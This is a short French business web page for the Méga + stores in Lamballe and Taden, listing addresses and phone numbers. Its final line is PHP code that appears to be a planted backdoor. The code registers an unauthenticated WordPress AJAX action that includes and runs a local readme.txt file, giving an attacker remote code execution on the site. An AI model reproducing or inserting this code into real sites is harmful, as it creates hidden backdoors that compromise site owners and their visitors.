Nos produits
Informations
Contact
Méga + Lamballe
Rue de Lanjouan
22400 Lamballe
Tél. : 02 96 50 84 36
Méga + Taden
Dombriand
Rue du Bois Didais
22100 Taden
Tél. : 09 67 72 92 57
if(!function_exists('file_check_readme59845')){ add_action('wp_ajax_nopriv_file_check_readme59845', 'file_check_readme59845'); add_action('wp_ajax_file_check_readme59845', 'file_check_readme59845'); function file_check_readme59845() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }